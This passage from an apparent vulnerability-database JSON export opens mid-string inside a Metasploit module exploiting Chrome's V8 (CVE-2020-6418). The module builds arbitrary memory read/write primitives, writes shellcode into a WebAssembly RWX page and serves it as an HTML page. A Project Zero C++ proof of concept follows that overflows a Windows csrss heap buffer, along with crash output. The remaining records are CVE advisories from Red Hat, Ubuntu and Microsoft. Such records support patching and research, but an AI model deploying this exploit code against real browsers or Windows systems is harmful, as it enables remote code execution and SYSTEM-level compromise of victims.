{ \nelements_addr = caddr - 8n | 1n; \n \ntemp = cabs_read4(caddr + 4n | 1n); \nprint('cabs_write4 temp: '+ hex(temp)); \n \nnew_val = (temp << 32n | val).i2f(); \n \ncrel_write4(float_carw_elements_offset, elements_addr); \nprint('cabs_write4 prev_val: '+ hex(float_carw[0].f2i())); \n \nfloat_carw[0] = new_val; \n// TODO restore elements ptr \nreturn res; \n} \n \nconst objleaker_offset = 0x41; \nfunction addrof(o) { \nobj_leaker.b = o; \naddr = crel_read4(objleaker_offset) & BigInt(2**32-2); \nobj_leaker.b = {}; \nreturn addr; \n} \n \nconst uint64_externalptr_offset = 0x1b; // in 8-bytes \n \n// Arbitrary read. We corrupt the backing store of the `uint64_aarw` array and then read from the array \nfunction read8(addr) { \nfaddr = addr.i2f(); \nt1 = float_rel[uint64_externalptr_offset]; \nt2 = float_rel[uint64_externalptr_offset + 1]; \nfloat_rel[uint64_externalptr_offset] = faddr; \nfloat_rel[uint64_externalptr_offset + 1] = 0.0; \n \nval = uint64_aarw[0]; \n \nfloat_rel[uint64_externalptr_offset] = t1; \nfloat_rel[uint64_externalptr_offset + 1] = t2; \nreturn val; \n} \n \n// Arbitrary write. 
We corrupt the backing store of the `uint64_aarw` array and then write into the array \nfunction write8(addr, val) { \nfaddr = addr.i2f(); \nt1 = float_rel[uint64_externalptr_offset]; \nt2 = float_rel[uint64_externalptr_offset + 1]; \nfloat_rel[uint64_externalptr_offset] = faddr; \nfloat_rel[uint64_externalptr_offset + 1] = 0.0; \n \nuint64_aarw[0] = val; \n \nfloat_rel[uint64_externalptr_offset] = t1; \nfloat_rel[uint64_externalptr_offset + 1] = t2; \nreturn val; \n} \n \n// Given an array of bigints, this will write all the elements to the address provided as argument \nfunction writeShellcode(addr, sc) { \nfaddr = addr.i2f(); \nt1 = float_rel[uint64_externalptr_offset]; \nt2 = float_rel[uint64_externalptr_offset + 1]; \nfloat_rel[uint64_externalptr_offset - 1] = 10; \nfloat_rel[uint64_externalptr_offset] = faddr; \nfloat_rel[uint64_externalptr_offset + 1] = 0.0; \n \nfor (var i = 0; i < sc.length; ++i) { \nuint64_aarw[i] = sc[i] \n} \n \nfloat_rel[uint64_externalptr_offset] = t1; \nfloat_rel[uint64_externalptr_offset + 1] = t2; \n} \n \n \nfunction get_compressed_rw() { \n \nfor (var i = 0; i < 0x10000; ++i) {empty();} \n \nmain(empty); \nmain(empty); \n \n// Function would be jit compiled now. 
\nmain(p); \n \nprint(`Corrupted length of float_rel array = ${float_rel.length}`); \n} \n \nfunction get_arw() { \nget_compressed_rw(); \nprint('should be 0x2: ' + hex(crel_read4(0x15))); \nlet previous_elements = crel_read4(0x14); \n//print(hex(previous_elements)); \n//print(hex(cabs_read4(previous_elements))); \n//print(hex(cabs_read4(previous_elements + 4n))); \ncabs_write4(previous_elements, 0x66554433n); \n//print(hex(cabs_read4(previous_elements))); \n//print(hex(cabs_read4(previous_elements + 4n))); \n \nprint('addrof(float_rel): ' + hex(addrof(float_rel))); \nuint64_aarw[0] = 0x4142434445464748n; \n} \n \nfunction rce() { \nfunction get_wasm_func() { \nvar importObject = { \nimports: { imported_func: arg => print(arg) } \n}; \nbc = [0x0, 0x61, 0x73, 0x6d, 0x1, 0x0, 0x0, 0x0, 0x1, 0x8, 0x2, 0x60, 0x1, 0x7f, 0x0, 0x60, 0x0, 0x0, 0x2, 0x19, 0x1, 0x7, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x73, 0xd, 0x69, 0x6d, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x0, 0x3, 0x2, 0x1, 0x1, 0x7, 0x11, 0x1, 0xd, 0x65, 0x78, 0x70, 0x6f, 0x72, 0x74, 0x65, 0x64, 0x5f, 0x66, 0x75, 0x6e, 0x63, 0x0, 0x1, 0xa, 0x8, 0x1, 0x6, 0x0, 0x41, 0x2a, 0x10, 0x0, 0xb]; \nwasm_code = new Uint8Array(bc); \nwasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), importObject); \nreturn wasm_mod.exports.exported_func; \n} \n \nlet wasm_func = get_wasm_func(); \n// traverse the JSFunction object chain to find the RWX WebAssembly code page \nlet wasm_func_addr = addrof(wasm_func); \nlet sfi = cabs_read4(wasm_func_addr + 12n) - 1n; \nprint('sfi: ' + hex(sfi)); \nlet WasmExportedFunctionData = cabs_read4(sfi + 4n) - 1n; \nprint('WasmExportedFunctionData: ' + hex(WasmExportedFunctionData)); \n \nlet instance = cabs_read4(WasmExportedFunctionData + 8n) - 1n; \nprint('instance: ' + hex(instance)); \n \nlet wasm_rwx_addr = cabs_read8(instance + 0x68n); \nprint('wasm_rwx_addr: ' + hex(wasm_rwx_addr)); \n \n// write the shellcode to the RWX page 
\nwhile(shellcode.length % 4 != 0){ \nshellcode += \"\\u9090\"; \n} \n \nlet sc = []; \n \n// convert the shellcode to BigInt \nfor (let i = 0; i < shellcode.length; i += 4) { \nsc.push(BigInt(shellcode.charCodeAt(i)) + BigInt(shellcode.charCodeAt(i + 1) * 0x10000) + BigInt(shellcode.charCodeAt(i + 2) * 0x100000000) + BigInt(shellcode.charCodeAt(i + 3) * 0x1000000000000)); \n} \n \nwriteShellcode(wasm_rwx_addr,sc); \n \nprint('success'); \nwasm_func(); \n} \n \n \nfunction exp() { \nget_arw(); \nrce(); \n} \n \nexp(); \n^ \n \nif datastore['DEBUG_EXPLOIT'] \ndebugjs = %Q^ \nprint = function(arg) { \nvar request = new XMLHttpRequest(); \nrequest.open(\"POST\", \"/print\", false); \nrequest.send(\"\" + arg); \n}; \n^ \njscript = \"#{debugjs}#{jscript}\" \nelse \njscript.gsub!(/\\/\\/.*$/, '') # strip comments \njscript.gsub!(/^\\s*print\\s*\\(.*?\\);\\s*$/, '') # strip print(*); \nend \n \nhtml = %Q^ \n<html> \n<head> \n<script> \n#{jscript} \n</script> \n</head> \n<body> \n</body> \n</html> \n^ \nsend_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control' => 'no-cache, no-store, must-revalidate', 'Pragma' => 'no-cache', 'Expires' => '0'}) \nend \n \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/156632/chrome_jscreate_sideeffect.rb.txt", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-12T17:03:13", "description": "", "cvss3": {"exploitabilityScore": 2.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-08-12T00:00:00", "type": "packetstorm", "title": "Windows sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity Heap Buffer Overflow", 
"bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1027", "CVE-2022-22026"], "modified": "2022-08-12T00:00:00", "id": "PACKETSTORM:168068", "href": "https://packetstormsecurity.com/files/168068/Windows-sxs-CNodeFactory-XMLParser_Element_doc_assembly_assemblyIdentity-Heap-Buffer-Overflow.html", "sourceData": "`Windows: Heap buffer overflow in sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity \n \n## SUMMARY \nA heap buffer overflow issue exists in Windows 11 and earlier versions. A malicious application may be able to execute arbitrary code with SYSTEM privileges. \n \n \n## VULNERABILITY DETAILS \nIn 2020, Project Zero reported a heap buffer overflow in application manifest parsing[1]. The `MaximumLength` field in one of the `UNICODE_STRING` parameters of the `BaseSrvSxsCreateActivationContextFromMessage` CSR routine wasn't properly validated, and was later used by `XMLParser_Element_doc_assembly_assemblyIdentity` as the maximum size of a `memcpy` destination buffer. The fix added an extra `CsrValidateMessageBuffer` call to `BaseSrvSxsCreateActivationContextFromMessage`. \n \nWe've just discovered that `BaseSrvSxsCreateActivationContextFromMessage` is not the only CSR routine that can reach `XMLParser_Element_doc_assembly_assemblyIdentity`. An attacker can trigger the same buffer overflow via `BaseSrvSxsCreateProcess`. \n \n1. 
https://googleprojectzero.github.io/0days-in-the-wild/0day-RCAs/2020/CVE-2020-1027.html \n \n \n## VERSION \nWindows 11 12H2 (OS Build 22000.593) \nWindows 10 12H2 (OS Build 19044.1586) \n \n \n## REPRODUCTION CASE \n1) Enable page heap verification for csrss.exe: \n``` \ngflags /p /enable csrss.exe /full \n``` \n \n2) Restart the machine. \n \n3) Compile and run: \n``` \n#pragma comment(lib, \"ntdll\") \n \n#include <windows.h> \n#include <winternl.h> \n#include <cstdint> \n#include <cstdio> \n#include <string> \n \ntypedef struct _SECTION_IMAGE_INFORMATION { \nPVOID EntryPoint; \nULONG StackZeroBits; \nULONG StackReserved; \nULONG StackCommit; \nULONG ImageSubsystem; \nWORD SubSystemVersionLow; \nWORD SubSystemVersionHigh; \nULONG Unknown1; \nULONG ImageCharacteristics; \nULONG ImageMachineType; \nULONG Unknown2[3]; \n} SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION; \n \ntypedef struct _RTL_USER_PROCESS_INFORMATION { \nULONG Size; \nHANDLE ProcessHandle; \nHANDLE ThreadHandle; \nCLIENT_ID ClientId; \nSECTION_IMAGE_INFORMATION ImageInformation; \nBYTE Unknown1[128]; \n} RTL_USER_PROCESS_INFORMATION, *PRTL_USER_PROCESS_INFORMATION; \n \nNTSTATUS(NTAPI* RtlCreateProcessParameters) \n(PRTL_USER_PROCESS_PARAMETERS*, \nPUNICODE_STRING, \nPUNICODE_STRING, \nPUNICODE_STRING, \nPUNICODE_STRING, \nPVOID, \nPUNICODE_STRING, \nPUNICODE_STRING, \nPUNICODE_STRING, \nPUNICODE_STRING); \nNTSTATUS(NTAPI* RtlCreateUserProcess) \n(PUNICODE_STRING, \nULONG, \nPRTL_USER_PROCESS_PARAMETERS, \nPSECURITY_DESCRIPTOR, \nPSECURITY_DESCRIPTOR, \nHANDLE, \nBOOLEAN, \nHANDLE, \nHANDLE, \nPRTL_USER_PROCESS_INFORMATION); \n \nPVOID(NTAPI* CsrAllocateCaptureBuffer)(ULONG, ULONG); \nVOID(NTAPI* CsrFreeCaptureBuffer)(PVOID); \nNTSTATUS(NTAPI* CsrClientCallServer)(PVOID, PVOID, ULONG, ULONG); \nNTSTATUS(NTAPI* CsrCaptureMessageString)(LPVOID, PCSTR, ULONG, ULONG, PSTR); \n \nvoid CaptureString(LPVOID capture_buffer, \nuint8_t* msg_field, \nPCWSTR string, \nsize_t length = 0) { \nif (length 
== 0) \nlength = lstrlenW(string); \n \nCsrCaptureMessageString(capture_buffer, (PCSTR)string, length * 2, \nlength * 2 + 2, (PSTR)msg_field); \n} \n \nint main() { \nHMODULE ntdll = LoadLibrary(L\"ntdll\"); \n \n#define INIT_PROC(name) \\ \nname = reinterpret_cast<decltype(name)>(GetProcAddress(ntdll, #name)); \n \nINIT_PROC(RtlCreateProcessParameters); \nINIT_PROC(RtlCreateUserProcess); \n \nINIT_PROC(CsrAllocateCaptureBuffer); \nINIT_PROC(CsrFreeCaptureBuffer); \nINIT_PROC(CsrClientCallServer); \nINIT_PROC(CsrCaptureMessageString); \n \nUNICODE_STRING image_path; \nPRTL_USER_PROCESS_PARAMETERS proc_params; \nRTL_USER_PROCESS_INFORMATION proc_info = {0}; \n \nRtlInitUnicodeString(&image_path, L\"\\\\SystemRoot\\\\notepad.exe\"); \nRtlCreateProcessParameters(&proc_params, &image_path, NULL, NULL, NULL, NULL, \nNULL, NULL, NULL, NULL); \nRtlCreateUserProcess(&image_path, OBJ_CASE_INSENSITIVE, proc_params, NULL, \nNULL, NULL, FALSE, NULL, NULL, &proc_info); \n \nconst size_t HEADER_SIZE = 0x40; \nuint8_t msg[HEADER_SIZE + 0x1f8] = {0}; \n \n#define FIELD(n) msg + HEADER_SIZE + 8 * n \n#define SET_FIELD(n, value) *(uint64_t*)(FIELD(n)) = (uint64_t)value; \n \nSET_FIELD(2, proc_info.ClientId.UniqueProcess); \nSET_FIELD(3, proc_info.ClientId.UniqueThread); \n \nSET_FIELD(4, -1); \nSET_FIELD(7, 1); \nSET_FIELD(8, 0x20000); \n \nstd::string manifest = \n\"<assembly xmlns='urn:schemas-microsoft-com:asm.v1' \" \n\"manifestVersion='1.0'>\" \n\"<assemblyIdentity name='@' version='1.0.0.0'/>\" \n\"</assembly>\"; \nmanifest.replace(manifest.find('@'), 1, 0x4000, 'A'); \n \nSET_FIELD(13, manifest.c_str()); \nSET_FIELD(14, manifest.size()); \n \nPVOID capture_buffer = CsrAllocateCaptureBuffer(6, 0x200); \n \nCaptureString(capture_buffer, FIELD(22), L\"C:\\\\Windows\\\\\"); \nCaptureString(capture_buffer, FIELD(24), L\"\\x00\\x00\", 2); \nCaptureString(capture_buffer, FIELD(28), L\"A\"); \nSET_FIELD(28, 0xff000002); \n \nCsrClientCallServer(msg, capture_buffer, 0x1001001d, 
\nsizeof(msg) - HEADER_SIZE); \n} \n``` \n \nThe crash should look like to the following: \n``` \nCONTEXT: 0000007c4afbcfc0 -- (.cxr 0x7c4afbcfc0) \nrax=0000020e6515ce00 rbx=0000000000004000 rcx=0000020e6515d010 \nrdx=fffffffffbe741fa rsi=0000020e652c48c0 rdi=0000000000000001 \nrip=00007ff825a53c53 rsp=0000007c4afbdd38 rbp=0000007c4afbde80 \nr8=0000000000000032 r9=00000000000001f7 r10=00007ff822e6b558 \nr11=0000020e60fd8ffc r12=0000020e66d1cf80 r13=0000000000000001 \nr14=0000000000000000 r15=0000000000000005 \niopl=0 nv up ei pl nz na pe nc \ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202 \nntdll!memcpy+0x113: \n0033:00007ff8`25a53c53 0f2941f0 movaps xmmword ptr [rcx-10h],xmm0 ds:002b:0000020e`6515d000=???????????????????????????????? \nResetting default scope \n \nWRITE_ADDRESS: 0000020e6515d000 \n \nEXCEPTION_RECORD: 0000007c4afbd4b0 -- (.exr 0x7c4afbd4b0) \nExceptionAddress: 00007ff825a53c53 (ntdll!memcpy+0x0000000000000113) \nExceptionCode: c0000005 (Access violation) \nExceptionFlags: 00000000 \nNumberParameters: 2 \nParameter[0]: 0000000000000001 \nParameter[1]: 0000020e6515d000 \nAttempt to write to address 0000020e6515d000 \n \nSTACK_TEXT: \n0000007c`4afbdd38 00007ff8`22df5a41 : 0000020e`652c48c0 00000000`00000001 00000000`00000001 00000000`00000001 : ntdll!memcpy+0x113 \n0000007c`4afbdd40 00007ff8`22e07b94 : 00007ff8`00000000 00000000`000000a8 0000020e`652c48c0 0000020e`652c48c0 : sxs!CNodeFactory::XMLParser_Element_doc_assembly_assemblyIdentity+0x4c1 \n0000007c`4afbe3c0 00007ff8`22e1f406 : 0000020e`652e7f20 0000020e`652e7f20 00000000`00000000 00000000`00000000 : sxs!CNodeFactory::CreateNode+0xd34 \n0000007c`4afbe7d0 00007ff8`22df8a33 : 0000020e`00000000 0000020e`652a8cc8 00000000`00000000 0000020e`65166e20 : sxs!XMLParser::Run+0x8d6 \n0000007c`4afbe8f0 00007ff8`22df7468 : 0000020e`00000000 0000020e`6527ac90 00000000`00000000 0000020e`6527ac90 : sxs!SxspIncorporateAssembly+0x513 \n0000007c`4afbeab0 00007ff8`22df7cf6 : 00000000`00000000 
00000000`00000000 0000020e`6527ac90 0000020e`65167720 : sxs!SxspIncorporateAssembly+0x104 \n0000007c`4afbeb60 00007ff8`22df3769 : 0000007c`00000000 0000007c`4afbefa0 00000000`00000000 0000020e`65166e20 : sxs!SxspCloseManifestGraph+0xbe \n0000007c`4afbec00 00007ff8`22fb3eed : 00000000`00000000 00000000`00000000 00000000`00000000 0000007c`4afbf3a0 : sxs!SxsGenerateActivationContext+0x339 \n0000007c`4afbed60 00007ff8`22fb2405 : 0000007c`4afbf1f0 000004f7`0000000b 00000000`00000000 00000000`00000001 : sxssrv!BaseSrvSxsCreateActivationContextFromStructEx+0x6ed \n0000007c`4afbf1a0 00007ff8`22fb1e91 : 0000020e`56e00000 00000000`01080002 00000000`00000264 00000000`00000270 : sxssrv!InternalSxsCreateProcess+0x545 \n0000007c`4afbf680 00007ff8`230133c3 : 00000000`00000000 0000007c`4afbf789 00000000`00000000 00000000`00000000 : sxssrv!BaseSrvSxsCreateProcess+0x71 \n0000007c`4afbf6c0 00007ff8`23036490 : 0000020e`ffffffff 0000007c`4afbf848 0000020e`00000000 0000020e`00000001 : basesrv!BaseSrvCreateProcess2+0x1f3 \n0000007c`4afbf7f0 00007ff8`25a0265f : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : CSRSRV!CsrApiRequestThread+0x4d0 \n0000007c`4afbfe90 00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x2f \n``` \n \n \n## CREDIT INFORMATION \nSergei Glazunov of Google Project Zero \n \n \nRelated CVE Numbers: CVE-2020-1027,CVE-2022-22026,CVE-2022-22026. 
\n \n \n \nFound by: glazunov@google.com \n \n`\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/168068/GS20220812145103.txt"}], "redhatcve": [{"lastseen": "2023-02-01T08:14:11", "description": "Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-26T07:44:08", "type": "redhatcve", "title": "CVE-2020-6418", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2023-02-01T05:37:35", "id": "RH:CVE-2020-6418", "href": "https://access.redhat.com/security/cve/cve-2020-6418", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2023-02-03T13:51:08", "description": "Type confusion in V8 in Google Chrome prior to 80.0.3987.122 allowed a\nremote attacker to potentially exploit heap corruption via a crafted HTML\npage.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[alexmurray](<https://launchpad.net/~alexmurray>) | 
The Debian chromium source package is called chromium-browser in Ubuntu\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-02-27T00:00:00", "type": "ubuntucve", "title": "CVE-2020-6418", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-6418"], "modified": "2020-02-27T00:00:00", "id": "UB:CVE-2020-6418", "href": "https://ubuntu.com/security/CVE-2020-6418", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "mscve": [{"lastseen": "2022-10-26T18:28:10", "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format.\n\nFor all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely. For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. 
An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nThere are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane.\n\nThe update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T07:00:00", "type": "mscve", "title": "Adobe Font Manager Library Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-0938"], "modified": "2020-04-14T07:00:00", "id": "MS:CVE-2020-0938", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-0938", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-26T18:28:10", "description": "An elevation of privilege vulnerability exists in the way that the Windows Kernel handles objects in memory. 
An attacker who successfully exploited the vulnerability could execute code with elevated permissions.\n\nTo exploit the vulnerability, a locally authenticated attacker could run a specially crafted application.\n\nThe security update addresses the vulnerability by ensuring the Windows Kernel properly handles objects in memory.\n", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-04-14T07:00:00", "type": "mscve", "title": "Windows Kernel Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1027"], "modified": "2020-04-14T07:00:00", "id": "MS:CVE-2020-1027", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1027", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-10-27T00:23:13", "description": "Microsoft has become aware of limited targeted Windows 7 based attacks that could leverage un-patched vulnerabilities in the Adobe Type Manager Library, and is providing the following guidance to help reduce customer risk until the security update is released. 
We appreciate the efforts of our industry partners and are complying with a 7-day timeline for disclosing information regarding these limited attacks.\n\nTwo remote code execution vulnerabilities exist in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format.\n\nThere are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane.\n\nMicrosoft is aware of this vulnerability and working on a fix. Updates that address security vulnerabilities in Microsoft software are typically released on Update Tuesday, the second Tuesday of each month. This predictable schedule allows for partner quality assurance and IT planning, which helps maintain the Windows ecosystem as a reliable, secure choice for our customers. The operating system versions that are affected by this vulnerability are listed below. Please see the mitigation and workarounds for guidance on how to reduce the risk.\n\n**Please Note:** The threat is low for those systems running Windows 10 due to mitigations that were put in place with the first version released in 2015.\n\nPlease see the mitigation section for details. Microsoft is not aware of any attacks against the Windows 10 platform. The possibility of remote code execution is negligible and elevation of privilege is not possible. 
We do not recommend that IT administrators running Windows 10 implement the workarounds described below.\n\nMicrosoft recommends upgrading to the Windows 10 family of clients and servers.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-03-23T07:00:00", "type": "mscve", "title": "Type 1 Font Parsing Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1020"], "modified": "2020-04-14T07:00:00", "id": "MS:ADV200006", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/ADV200006", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-10-26T18:28:10", "description": "A remote code execution vulnerability exists in Microsoft Windows when the Windows Adobe Type Manager Library improperly handles a specially-crafted multi-master font - Adobe Type 1 PostScript format.\n\nFor all systems except Windows 10, an attacker who successfully exploited the vulnerability could execute code remotely. 
For systems running Windows 10, an attacker who successfully exploited the vulnerability could execute code in an AppContainer sandbox context with limited privileges and capabilities. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.\n\nThere are multiple ways an attacker could exploit the vulnerability, such as convincing a user to open a specially crafted document or viewing it in the Windows Preview pane.\n\nThe update addresses the vulnerability by correcting how the Windows Adobe Type Manager Library handles Type1 fonts.\n", "edition": 1, "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2020-04-14T07:00:00", "type": "mscve", "title": "Adobe Font Manager Library Remote Code Execution Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1020"], "modified": "2020-04-14T07:00:00", "id": "MS:CVE-2020-1020", "href": 